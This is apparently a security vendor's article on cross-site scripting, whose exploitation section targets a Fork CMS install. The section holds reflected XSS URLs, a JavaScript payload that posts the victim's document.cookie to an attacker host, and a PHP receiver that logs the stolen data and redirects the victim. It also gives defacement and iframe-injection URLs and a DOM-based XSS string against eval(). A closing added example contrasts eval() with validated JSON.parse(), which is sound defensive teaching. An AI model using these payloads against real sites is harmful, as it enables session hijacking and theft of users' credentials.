Cross-Site Scripting — XSS [CWE-79] — The Hacktivists

1. Description

2. Potential impact

3. Attack patterns

4. Affected software

5. Exploitation Examples

http://forkcms.local/private/en/error?type=%3Cscript%20src=http://attackersite.com/fork.js%3E%3C/script%3E
// Payload script loaded by the reflected URL above (fork.js): builds a hidden
// form and submits the victim's document.cookie to the attacker's endpoint.
function post_to_url(path, params, method) {
    var form = document.createElement("form");
    form.setAttribute("method", method);
    form.setAttribute("action", path);
    var hiddenField = document.createElement("input");
    hiddenField.setAttribute("type", "hidden");
    hiddenField.setAttribute("name", "1");
    hiddenField.setAttribute("value", params);
    form.appendChild(hiddenField);
    document.body.appendChild(form);
    form.submit();
}
post_to_url("http://attackersite.com/fork.php", document.cookie, "post");
<?php
// Receiver (fork.php): appends the posted fields to fork.txt, then redirects the
// victim back to the application so the request goes unnoticed.
file_put_contents($_SERVER["DOCUMENT_ROOT"] . "/fork.txt", $_POST, FILE_APPEND);
file_put_contents($_SERVER["DOCUMENT_ROOT"] . "/fork.txt", "\r\n", FILE_APPEND);
header("Location: http://forkcms.local/private/en/");
exit;
?>
http://forkcms.local/private/en/error?type=%3C/div%3E%3Cdiv%20style=%22color:white;font:75px%20arial;position:absolute;left:0;top:0;background:black;width:100%;height:888px; border:1px%20solid;z-index:1000%22%3E%3Ccenter%3EXSS%3C/div%3E
http://forkcms.local/private/en/error?type=%3C/div%3E%3Ciframe%20src=%22http://www.attacker-site.com/file.html%22%20style=%22border=0;z-index:1000;position:absolute;left:0;top:0;height:100%;width:100%;%22%3E%3C/iframe%3E
{"OnlineUsers": "4", "UserAndStatus": ["User1, Online", "User2, Online", "User3, Online", "User4, Busy"]}
// Client-side code that fetches the status document above. The endpoint is not
// named on the page; the value of url below is an assumed placeholder.
var url = "/status"; // assumed endpoint returning the JSON shown above
var http_request = new XMLHttpRequest();
var Contacts;
http_request.open("GET", url, true);
http_request.onreadystatechange = function () {
    if (http_request.readyState == 4) {
        if (http_request.status == 200) {
            // DOM-based XSS sink: the response body is executed as JavaScript
            // instead of being parsed as data, so any attacker-controlled
            // field that closes the literal and appends code will run.
            Contacts = eval("(" + http_request.responseText + ")");
        }
        http_request = null;
    }
};
http_request.send(null);
Busy"});alert("DOM based XSS");//
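The following is an added example and not code from the original post. It places the eval()-based parsing shown above next to a parser built on JSON.parse() with shape validation, using constructed copies of the page's status document; the attacker-controlled status field in the tampered copy calls a counter function instead of alert() so the effect can be observed outside a browser.

```javascript
// Added example (not the post's code): eval() parsing versus JSON.parse() with
// validation, run against constructed responses modelled on the page's sample.

// Counts how often response-supplied code ran; the tampered response calls it.
let injectedCalls = 0;
function injected() { injectedCalls += 1; }

// Constructed benign response, same shape as the one in the post.
const BENIGN = '{"OnlineUsers": "4", "UserAndStatus": ["User1, Online", "User4, Busy"]}';
// Constructed tampered response: the last status field closes the object
// literal and appends a statement, exactly the pattern the page demonstrates.
const TAMPERED = '{"OnlineUsers": "4", "UserAndStatus": ["User1, Online", "User4, Busy"]}); injected(); //"]}';

// The vulnerable pattern from the post: the response text is executed as script,
// so everything after the closing ")" in the tampered response runs.
function parseWithEval(text) {
  return eval("(" + text + ")");
}

// Hardened parser: JSON.parse() never executes code (trailing code is a syntax
// error), and the result is checked against the exact shape the UI expects.
function parseContacts(text) {
  let data;
  try {
    data = JSON.parse(text);
  } catch (e) {
    return null; // malformed or tampered response: reject, do not execute
  }
  if (typeof data !== "object" || data === null) return null;
  if (typeof data.OnlineUsers !== "string" || !/^\d+$/.test(data.OnlineUsers)) return null;
  if (!Array.isArray(data.UserAndStatus)) return null;
  if (!data.UserAndStatus.every((s) => typeof s === "string")) return null;
  return { onlineUsers: Number(data.OnlineUsers), userAndStatus: data.UserAndStatus };
}

// Returns how many times response-supplied code has run so far.
function injectedCallCount() { return injectedCalls; }
```

When the parsed strings are later written into the page, use textContent or a DOM text node rather than innerHTML, so a status such as `<img src=x onerror=...>` is displayed literally instead of being interpreted as markup.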

6. Severity and CVSS Scoring


Contact us for Information Security Services & Training https://thehacktivists.in/
